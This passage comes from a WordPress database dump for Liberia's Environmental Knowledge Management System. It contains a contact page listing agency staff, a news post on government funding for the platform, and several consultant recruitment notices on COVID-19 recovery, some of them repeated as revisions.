src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/nadine.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2022/09/nadine.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2022/09/nadine-300x279.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2022/09/nadine-600x559.jpg 600w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/henry.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2022/09/henry.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2022/09/henry-300x279.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2022/09/henry-600x559.jpg 600w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA<br /><a href=\"&quot;mailto:stephenlavalah@yahoo.com\">stephenlavalah@yahoo.com</a></p><p><strong>Nadine A\'jami</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n												<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/sherman-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/borbor-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />Finance &amp; Administrative Officer<br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/simpson-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Henry A. Simpson </strong><br />Weather Forecaster<br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p>		\n												<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/domah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/domah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/domah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />Administrative Assistant, Office of the Minister<br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel G. Ballah </strong><br />MGCSP<br /><a href=\"mailto:emmanuelgballah_@gmail.com\">emmanuelgballah_@gmail.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2022-09-20 11:02:14','2022-09-20 11:02:14','',80,'https://ekmsliberia.info/?p=5100',0,'revision','',0),(5101,42,'2022-09-19 11:38:00','2022-09-19 11:38:00','<!-- wp:paragraph -->\n<p>The Government of Liberia through the Ministry of Finance and Development Planning has committed US$ 50,000 for the management and sustainability of the Environmental Knowledge Management System (EKMS), a platform that provides free environmental information from government ministries, agencies and commissions and development partners on the implementation of the Rio Conventions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EKMS was created under the Cross-Cutting Capacity Development (CCCD) Project, which is funded by the Global Environmental Facility (GEF) and implemented by the Environmental Protection Agency (EPA) and the United Nations Development Program (UNDP).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The CCCD Project was to strengthen national capacities to meet global environmental obligations within the framework of sustainable development priorities to enable Liberia to make better decisions to meet and sustain global environmental obligations; specifically, for Liberia to have the capacity to coordinate efforts as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EKMS is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions mainstreaming within the natural resources management sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The platform is one of the achievements of the CCCD Project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The CCCD project ends on 30<sup>th</sup> September 2022; harboring fear that the EKMS, which currently has over 37,000 users including students and researchers globally will collapse after the expiration of period.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Considering the need for the sustainability of the system, the EPA through the CCCD Project team in collaboration with the UNDP and support from GEF held a two-day gathering dubbed as ‘Resident Dialogue on EKMS Implementation and Sustainability’ at Farmington Hotel in Margibi County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The two-day event was intended to further sell the EKMS to policy makers and institutions of higher learning, whose students are benefiting from the platform and as well seek their financial and moral supports for the sustainability of the platform after 30<sup>th</sup> September 2022.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The meeting attracted representatives of government and non-governmental institutions whose activities and programs directly or indirectly impact the environment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Apparently, it works very well as the Ministry of Finance and Development Planning promised that beginning 2023, the EKMS would be mainstream the national budget and pledged to underwrite the cost of the system for the next three months including October, November and December.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The UNDP also promised to pay the EKMS staff their outstanding salaries for the months of July, August and September 2022, while the University of Liberia promised to avail her radio station for the dissemination of environmental information relative to the EKMS and the Rio Conventions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Liberia Institute and Geo-Information Services LISGIS also promised to provide training opportunities for the EKMS team, while the National Disaster Management Agency also promised to avail her conference hall for the conduct of meetings/ workshops for purposes relative to the EKMS without a fee.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia Land Authority said it would also avail its platform on Freedom FM periodically to create environmental awareness relatively to the EKMS.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a related development, the EKMS will be launch on Wednesday, September 21, 2022 at the Monrovia City Hall.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At the official launch of the EKMS, information technologists that were trained to serve as EKMS officers will be certificated.</p>\n<!-- /wp:paragraph -->','Gov\'t Commits US$50,000 for the Sustainability of the EKMS','','publish','open','closed','','govt-commits-50000-for-the-sustainability-of-the-ekms','','','2022-09-20 11:43:42','2022-09-20 11:43:42','',0,'https://ekmsliberia.info/?p=5101',100,'post','',0),(5102,42,'2022-09-20 11:41:27','2022-09-20 11:41:27','','dialogue','','inherit','open','closed','','dialogue','','','2022-09-20 11:41:27','2022-09-20 11:41:27','',5101,'https://ekmsliberia.info/wp-content/uploads/2022/09/dialogue.png',0,'attachment','image/png',0),(5103,42,'2022-09-20 11:41:54','2022-09-20 11:41:54','<!-- wp:paragraph -->\n<p>The Government of Liberia through the Ministry of Finance and Development Planning has committed US$ 50,000 for the management and sustainability of the Environmental Knowledge Management System (EKMS), a platform that provides free environmental information from government ministries, agencies and commissions and development partners on the implementation of the Rio Conventions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EKMS was created under the Cross-Cutting Capacity Development (CCCD) Project, which is funded by the Global Environmental Facility (GEF) and implemented by the Environmental Protection Agency (EPA) and the United Nations Development Program (UNDP).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The CCCD Project was to strengthen national capacities to meet global environmental obligations within the framework of sustainable development priorities to enable Liberia to make better decisions to meet and sustain global environmental obligations; specifically, for Liberia to have the capacity to coordinate efforts as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EKMS is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions mainstreaming within the natural resources management sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The platform is one of the achievements of the CCCD Project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The CCCD project ends on 30<sup>th</sup> September 2022; harboring fear that the EKMS, which currently has over 37,000 users including students and researchers globally will collapse after the expiration of period.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Considering the need for the sustainability of the system, the EPA through the CCCD Project team in collaboration with the UNDP and support from GEF held a two-day gathering dubbed as ‘Resident Dialogue on EKMS Implementation and Sustainability’ at Farmington Hotel in Margibi County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The two-day event was intended to further sell the EKMS to policy makers and institutions of higher learning, whose students are benefiting from the platform and as well seek their financial and moral supports for the sustainability of the platform after 30<sup>th</sup> September 2022.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The meeting attracted representatives of government and non-governmental institutions whose activities and programs directly or indirectly impact the environment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Apparently, it works very well as the Ministry of Finance and Development Planning promised that beginning 2023, the EKMS would be mainstream the national budget and pledged to underwrite the cost of the system for the next three months including October, November and December.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The UNDP also promised to pay the EKMS staff their outstanding salaries for the months of July, August and September 2022, while the University of Liberia promised to avail her radio station for the dissemination of environmental information relative to the EKMS and the Rio Conventions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Liberia Institute and Geo-Information Services LISGIS also promised to provide training opportunities for the EKMS team, while the National Disaster Management Agency also promised to avail her conference hall for the conduct of meetings/ workshops for purposes relative to the EKMS without a fee.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia Land Authority said it would also avail its platform on Freedom FM periodically to create environmental awareness relatively to the EKMS.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a related development, the EKMS will be launch on Wednesday, September 21, 2022 at the Monrovia City Hall.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At the official launch of the EKMS, information technologists that were trained to serve as EKMS officers will be certificated.</p>\n<!-- /wp:paragraph -->','Gov\'t Commits $50,000 for the Sustainability of the EKMS','','inherit','closed','closed','','5101-revision-v1','','','2022-09-20 11:41:54','2022-09-20 11:41:54','',5101,'https://ekmsliberia.info/?p=5103',0,'revision','',0),(5104,42,'2022-09-20 11:43:40','2022-09-20 11:43:40','<!-- wp:paragraph -->\n<p>The Government of Liberia through the Ministry of Finance and Development Planning has committed US$ 50,000 for the management and sustainability of the Environmental Knowledge Management System (EKMS), a platform that provides free environmental information from government ministries, agencies and commissions and development partners on the implementation of the Rio Conventions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EKMS was created under the Cross-Cutting Capacity Development (CCCD) Project, which is funded by the Global Environmental Facility (GEF) and implemented by the Environmental Protection Agency (EPA) and the United Nations Development Program (UNDP).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The CCCD Project was to strengthen national capacities to meet global environmental obligations within the framework of sustainable development priorities to enable Liberia to make better decisions to meet and sustain global environmental obligations; specifically, for Liberia to have the capacity to coordinate efforts as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EKMS is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions mainstreaming within the natural resources management sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The platform is one of the achievements of the CCCD Project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The CCCD project ends on 30<sup>th</sup> September 2022; harboring fear that the EKMS, which currently has over 37,000 users including students and researchers globally will collapse after the expiration of period.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Considering the need for the sustainability of the system, the EPA through the CCCD Project team in collaboration with the UNDP and support from GEF held a two-day gathering dubbed as ‘Resident Dialogue on EKMS Implementation and Sustainability’ at Farmington Hotel in Margibi County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The two-day event was intended to further sell the EKMS to policy makers and institutions of higher learning, whose students are benefiting from the platform and as well seek their financial and moral supports for the sustainability of the platform after 30<sup>th</sup> September 2022.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The meeting attracted representatives of government and non-governmental institutions whose activities and programs directly or indirectly impact the environment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Apparently, it works very well as the Ministry of Finance and Development Planning promised that beginning 2023, the EKMS would be mainstream the national budget and pledged to underwrite the cost of the system for the next three months including October, November and December.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The UNDP also promised to pay the EKMS staff their outstanding salaries for the months of July, August and September 2022, while the University of Liberia promised to avail her radio station for the dissemination of environmental information relative to the EKMS and the Rio Conventions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Liberia Institute and Geo-Information Services LISGIS also promised to provide training opportunities for the EKMS team, while the National Disaster Management Agency also promised to avail her conference hall for the conduct of meetings/ workshops for purposes relative to the EKMS without a fee.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia Land Authority said it would also avail its platform on Freedom FM periodically to create environmental awareness relatively to the EKMS.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a related development, the EKMS will be launch on Wednesday, September 21, 2022 at the Monrovia City Hall.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At the official launch of the EKMS, information technologists that were trained to serve as EKMS officers will be certificated.</p>\n<!-- /wp:paragraph -->','Gov\'t Commits US$50,000 for the Sustainability of the EKMS','','inherit','closed','closed','','5101-revision-v1','','','2022-09-20 11:43:40','2022-09-20 11:43:40','',5101,'https://ekmsliberia.info/?p=5104',0,'revision','',0),(5109,42,'2022-09-21 14:34:50','2022-09-21 14:34:50','The Government of Liberia through the Environmental Protection Agency has received funding from the Green Climate Fund (GCF) under its resilient recovery rapid readiness support project to undertake study on the impact of COVID on pro poor agenda for prosperity and\r\ndevelopment. Additionally, the project will develop a comprehensive resilient recovery strategy to public and private investment or actions for robust economic recovery, post COVID 19 and facilitate sub-national stakeholder meetings on the diagnostic analysis of the impact of COVID-19 as well as launch the National Dialogue on the next steps post-COVID 19 and economic recovery plan.\r\nThe Resilient Recovery Rapid Readiness support of the GCF will be used to:\r\na) Study the impact of COVID 19 on key sectors such as transport, trade, fiscal and monetary landscape, energy, health, fisheries.\r\nb) Build national human capacity to originate bankable concept notes and funding proposals\r\nc) Facilitate sub-national level diagnostic analysis of the impact of COVID 19.\r\nd) Ensure institutional strengthening through efficient knowledge management and\r\nretention\r\nIn rolling out this project, the Government intends to apply part of the project funds to recruit a project manager.\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/09/ToR-Project-Manager_Resilient-Recovery-Rapid-Readiness-Suppor444444444.docx\" target=\"_blank\" rel=\"noopener\">Consultant Services Needed</a></strong></em>','Request for Expression of Interest - Project Manager','','publish','closed','closed','','request-for-expression-of-interest-project-manager','','','2022-09-21 14:34:50','2022-09-21 14:34:50','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5109',66,'ekms_bulletin','',0),(5110,42,'2022-09-21 14:33:59','2022-09-21 14:33:59','','ToR Project Manager_Resilient Recovery Rapid Readiness Suppor444444444','','inherit','open','closed','','tor-project-manager_resilient-recovery-rapid-readiness-suppor444444444','','','2022-09-21 14:33:59','2022-09-21 14:33:59','',0,'https://ekmsliberia.info/wp-content/uploads/2022/09/ToR-Project-Manager_Resilient-Recovery-Rapid-Readiness-Suppor444444444.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5111,42,'2022-09-21 14:34:50','2022-09-21 14:34:50','The Government of Liberia through the Environmental Protection Agency has received funding from the Green Climate Fund (GCF) under its resilient recovery rapid readiness support project to undertake study on the impact of COVID on pro poor agenda for prosperity and\r\ndevelopment. Additionally, the project will develop a comprehensive resilient recovery strategy to public and private investment or actions for robust economic recovery, post COVID 19 and facilitate sub-national stakeholder meetings on the diagnostic analysis of the impact of COVID-19 as well as launch the National Dialogue on the next steps post-COVID 19 and economic recovery plan.\r\nThe Resilient Recovery Rapid Readiness support of the GCF will be used to:\r\na) Study the impact of COVID 19 on key sectors such as transport, trade, fiscal and monetary landscape, energy, health, fisheries.\r\nb) Build national human capacity to originate bankable concept notes and funding proposals\r\nc) Facilitate sub-national level diagnostic analysis of the impact of COVID 19.\r\nd) Ensure institutional strengthening through efficient knowledge management and\r\nretention\r\nIn rolling out this project, the Government intends to apply part of the project funds to recruit a project manager.\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/09/ToR-Project-Manager_Resilient-Recovery-Rapid-Readiness-Suppor444444444.docx\" target=\"_blank\" rel=\"noopener\">Consultant Services Needed</a></strong></em>','Request for Expression of Interest - Project Manager','','inherit','closed','closed','','5109-revision-v1','','','2022-09-21 14:34:50','2022-09-21 14:34:50','',5109,'https://ekmsliberia.info/?p=5111',0,'revision','',0),(5112,42,'2022-09-21 14:34:55','2022-09-21 14:34:55','The Government of Liberia through the Environmental Protection Agency has received funding from the Green Climate Fund (GCF) under its resilient recovery rapid readiness support project to undertake study on the impact of COVID on pro poor agenda for prosperity and\ndevelopment. Additionally, the project will develop a comprehensive resilient recovery strategy to public and private investment or actions for robust economic recovery, post COVID 19 and facilitate sub-national stakeholder meetings on the diagnostic analysis of the impact of COVID-19 as well as launch the National Dialogue on the next steps post-COVID 19 and economic recovery plan.\nThe Resilient Recovery Rapid Readiness support of the GCF will be used to:\na) Study the impact of COVID 19 on key sectors such as transport, trade, fiscal and monetary landscape, energy, health, fisheries.\nb) Build national human capacity to originate bankable concept notes and funding proposals\nc) Facilitate sub-national level diagnostic analysis of the impact of COVID 19.\nd) Ensure institutional strengthening through efficient knowledge management and\nretention\nIn rolling out this project, the Government intends to apply part of the project funds to recruit a project manager.\n\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/09/ToR-Project-Manager_Resilient-Recovery-Rapid-Readiness-Suppor444444444.docx\" target=\"_blank\" rel=\"noopener\">Consultant Services Needed</a></strong></em>','Request for Expression of Interest - Project Manager','','inherit','closed','closed','','5109-autosave-v1','','','2022-09-21 14:34:55','2022-09-21 14:34:55','',5109,'https://ekmsliberia.info/?p=5112',0,'revision','',0),(5113,42,'2022-09-21 16:06:41','2022-09-21 16:06:41','In Liberia’s implementation of national development plan, Pro-Poor Agenda for Prosperity and Development (PAPD), in the second year, was embraced with the COVID 19, which has greatly affected economic activities, resource mobilization both domestically and internationally. The spread of COVID-19 in the global economy affected domestic resource mobilization especially taxes on international trade, taxes on goods and services, rental, and corporation taxes on global and national lockdowns. As the revenue generation capacities get lower, the funding of the programs within the PAPD will be slim, thereby affecting the overall achievement of the major targets. Given the current macroeconomic outlook of our country, the attainment of the original targets of the PAPD reminds unrealistic, leading us to reconsider in the context of the COVID-19 and the current realities. Based on these, the revision and reprogramming of the PAPD being considered. Said revision would consider assessing the impact of the targets, the economic recovery interventions to reposition the PAPD, and accelerated actions needed to meet key targets of the PAPD. More besides, COVID 19 pandemic has placed restraints on the Government of Liberia ability) to undertake\r\nextensive review PAPD and develop investment plan and strategy dealing with the COVID related shocks. Therefore, revising the PAPD and developing an investment plan will essentially require funding.\r\nAgainst this backdrop, EPA applied, sourced, and received funding from GCF under the resilient recovery rapid readiness support project. This is an opportunity for EPA to guide the country in its COVID 19 recovery plan. To this effect, the Government of Liberia through the EPA is seeking to recruit competent expert consultant to deliver on the following outputs.\r\n\r\n<strong><em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/09/Consultant-to-Review-Analysis-Report-of-the-Impact-of-COVID.docx\" target=\"_blank\" rel=\"noopener\">Consultant Services Needed</a></em></strong>','Consultant Needed to Review Analysis Report of the Impact of COVID','','publish','closed','closed','','consultant-needed-to-review-analysis-report-of-the-impact-of-covid','','','2022-09-21 16:06:41','2022-09-21 16:06:41','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5113',65,'ekms_bulletin','',0),(5114,42,'2022-09-21 16:05:26','2022-09-21 16:05:26','','Consultant to Review Analysis Report of the Impact of COVID','','inherit','open','closed','','consultant-to-review-analysis-report-of-the-impact-of-covid','','','2022-09-21 16:05:26','2022-09-21 16:05:26','',0,'https://ekmsliberia.info/wp-content/uploads/2022/09/Consultant-to-Review-Analysis-Report-of-the-Impact-of-COVID.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5115,42,'2022-09-21 16:06:41','2022-09-21 16:06:41','In Liberia’s implementation of national development plan, Pro-Poor Agenda for Prosperity and Development (PAPD), in the second year, was embraced with the COVID 19, which has greatly affected economic activities, resource mobilization both domestically and internationally. The spread of COVID-19 in the global economy affected domestic resource mobilization especially taxes on international trade, taxes on goods and services, rental, and corporation taxes on global and national lockdowns. As the revenue generation capacities get lower, the funding of the programs within the PAPD will be slim, thereby affecting the overall achievement of the major targets. Given the current macroeconomic outlook of our country, the attainment of the original targets of the PAPD reminds unrealistic, leading us to reconsider in the context of the COVID-19 and the current realities. Based on these, the revision and reprogramming of the PAPD being considered. Said revision would consider assessing the impact of the targets, the economic recovery interventions to reposition the PAPD, and accelerated actions needed to meet key targets of the PAPD. More besides, COVID 19 pandemic has placed restraints on the Government of Liberia ability) to undertake\r\nextensive review PAPD and develop investment plan and strategy dealing with the COVID related shocks. Therefore, revising the PAPD and developing an investment plan will essentially require funding.\r\nAgainst this backdrop, EPA applied, sourced, and received funding from GCF under the resilient recovery rapid readiness support project. This is an opportunity for EPA to guide the country in its COVID 19 recovery plan. To this effect, the Government of Liberia through the EPA is seeking to recruit competent expert consultant to deliver on the following outputs.\r\n\r\n<strong><em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/09/Consultant-to-Review-Analysis-Report-of-the-Impact-of-COVID.docx\" target=\"_blank\" rel=\"noopener\">Consultant Services Needed</a></em></strong>','Consultant Needed to Review Analysis Report of the Impact of COVID','','inherit','closed','closed','','5113-revision-v1','','','2022-09-21 16:06:41','2022-09-21 16:06:41','',5113,'https://ekmsliberia.info/?p=5115',0,'revision','',0),(5116,42,'2022-09-21 16:11:27','2022-09-21 16:11:27','In Liberia’s implementation of national development plan, Pro-Poor Agenda for Prosperity and Development (PAPD), in the second year, was embraced with the COVID 19, which has greatly affected economic activities, resource mobilization both domestically and internationally. The spread of COVID-19 in the global economy affected domestic resource mobilization especially taxes on international trade, taxes on goods and services, rental, and corporation taxes on global and national lockdowns. As the revenue generation capacities get lower, the funding of the programs within the PAPD will be slim, thereby affecting the overall achievement of the major targets. Given the current macroeconomic outlook of our country, the attainment of the original targets of the PAPD reminds unrealistic, leading us to reconsider in the context of the COVID-19 and the current realities. Based on these, the revision and reprogramming of the PAPD being considered. Said revision would consider assessing the impact of the targets, the economic recovery interventions to reposition the PAPD, and accelerated actions needed to meet key targets of the PAPD. More besides, COVID 19 pandemic has placed restraints on the Government of Liberia ability) to undertake extensive review PAPD and develop investment plan and strategy dealing with the COVID related shocks. Therefore, revising the PAPD and developing an investment plan will essentially require funding.\r\n\r\n<strong><em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/09/Expert-Consultant.docx\" target=\"_blank\" rel=\"noopener\">Expert Consultant Services Needed</a></em></strong>','Expert Needed to Conduct Feasibility Study on Priority Measures','','publish','closed','closed','','expert-needed-to-conduct-feasibility-study-on-priority-measures','','','2022-09-21 16:11:27','2022-09-21 16:11:27','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5116',64,'ekms_bulletin','',0),(5117,42,'2022-09-21 16:09:56','2022-09-21 16:09:56','','Expert Consultant','','inherit','open','closed','','expert-consultant','','','2022-09-21 16:09:56','2022-09-21 16:09:56','',0,'https://ekmsliberia.info/wp-content/uploads/2022/09/Expert-Consultant.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5118,42,'2022-09-21 16:11:27','2022-09-21 16:11:27','In Liberia’s implementation of national development plan, Pro-Poor Agenda for Prosperity and Development (PAPD), in the second year, was embraced with the COVID 19, which has greatly affected economic activities, resource mobilization both domestically and internationally. The spread of COVID-19 in the global economy affected domestic resource mobilization especially taxes on international trade, taxes on goods and services, rental, and corporation taxes on global and national lockdowns. As the revenue generation capacities get lower, the funding of the programs within the PAPD will be slim, thereby affecting the overall achievement of the major targets. Given the current macroeconomic outlook of our country, the attainment of the original targets of the PAPD reminds unrealistic, leading us to reconsider in the context of the COVID-19 and the current realities. Based on these, the revision and reprogramming of the PAPD being considered. Said revision would consider assessing the impact of the targets, the economic recovery interventions to reposition the PAPD, and accelerated actions needed to meet key targets of the PAPD. More besides, COVID 19 pandemic has placed restraints on the Government of Liberia ability) to undertake extensive review PAPD and develop investment plan and strategy dealing with the COVID related shocks. Therefore, revising the PAPD and developing an investment plan will essentially require funding.\r\n\r\n<strong><em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/09/Expert-Consultant.docx\" target=\"_blank\" rel=\"noopener\">Expert Consultant Services Needed</a></em></strong>','Expert Needed to Conduct Feasibility Study on Priority Measures','','inherit','closed','closed','','5116-revision-v1','','','2022-09-21 16:11:27','2022-09-21 16:11:27','',5116,'https://ekmsliberia.info/?p=5118',0,'revision','',0),(5119,42,'2022-09-21 16:14:55','2022-09-21 16:14:55','In Liberia’s implementation of national development plan, Pro-Poor Agenda for Prosperity and Development (PAPD), in the second year, was embraced with the COVID 19, which has greatly affected economic activities, resource mobilization both domestically and internationally. The spread of COVID-19 in the global economy affected domestic resource mobilization especially taxes on international trade, taxes on goods and services, rental, and corporation taxes on global and national lockdowns. As the revenue generation capacities get lower, the funding of the 